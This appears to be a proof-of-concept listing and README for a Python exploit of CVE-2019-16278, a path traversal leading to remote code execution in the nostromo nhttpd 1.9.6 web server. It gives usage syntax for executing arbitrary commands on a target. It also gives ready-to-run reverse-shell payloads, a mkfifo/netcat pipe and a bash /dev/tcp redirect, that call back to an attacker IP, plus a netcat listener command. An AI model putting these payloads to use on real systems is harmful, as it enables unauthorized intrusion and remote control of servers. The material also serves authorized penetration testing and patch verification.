
CVE-2019-16278 PoC — nostromo nhttpd path traversal vulnerability

Associated Vulnerability
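Title: nostromo nhttpd path traversal vulnerability (CVE-2019-16278)
Description: nostromo nhttpd is an open-source web server. The ‘http_verify’ function in nostromo nhttpd 1.9.6 and earlier contains a path traversal vulnerability. The vulnerability stems from the network system or product failing to properly filter special elements in resource or file paths. An attacker can exploit it to access locations outside the restricted directory.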
Description
An unauthenticated attacker can force the server to point to a shell file such as ‘/bin/sh’ and execute arbitrary commands, because the server fails to verify the URL, which allows path traversal to any file that exists on the system. Nostromo’s versions such as 1.9.6 fail to verify this URL
Readme


**Repository:** [https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git](https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git)  

## 📜 Description  
This repository contains a Python exploit for **CVE-2019-16278**, a vulnerability in **Nostromo 1.9.6** (a web server). The vulnerability allows for **Remote Code Execution (RCE)** by exploiting directory traversal to execute arbitrary commands on the target system.

## 🚀 Features  
- Execute custom shell commands on the vulnerable target.  
- Support for reverse shell payloads.  
- Ability to customize the size of the response from the target.  

---

## 🛠️ Requirements  
- **Python 3.x**  
- A machine running **Nostromo 1.9.6** (the vulnerable target).  
- **Netcat (nc)** to catch reverse shells.  

---

## ⚙️ Usage  

### Step 1: Clone the Repository  
```bash
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
```

### Step 2: Run the Exploit  
```bash
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
```

### Arguments  

| Argument | Description | Required | Default |
|---|---|---|---|
| `-t`, `--target` | The target IP address | Yes | None |
| `-p`, `--port` | The target port | Yes | None |
| `-c`, `--command` | The command to execute on the server | Yes | None |
| `-b`, `--bytes` | Number of bytes to read in response | No | 4096 |

---

## 🧑‍💻 Examples  

### Example 1: Run whoami on the Target  
```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
```

### Example 2: Reverse Shell with Netcat  

Step 1: Start a Netcat listener on your attacking machine:

```bash
nc -lvnp 443
```

Step 2: Execute the exploit with a reverse shell payload:

```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
```

### Example 3: Reverse Shell using /dev/tcp  
```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
```

---

## 🔍 Vulnerability Details  
- **CVE:** CVE-2019-16278  
- **Affected Software:** Nostromo 1.9.6 Web Server  
- **Type:** Directory Traversal -> Remote Code Execution  
## ⚠️ Disclaimer

This tool is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized access to systems is illegal. Use responsibly.
File Snapshot

[4.0K] /data/pocs/62dc2c0dd44576a01aa57231819c48d232484a6a
├── [1.2K] exploit.py
└── [2.3K] README.md

0 directories, 2 files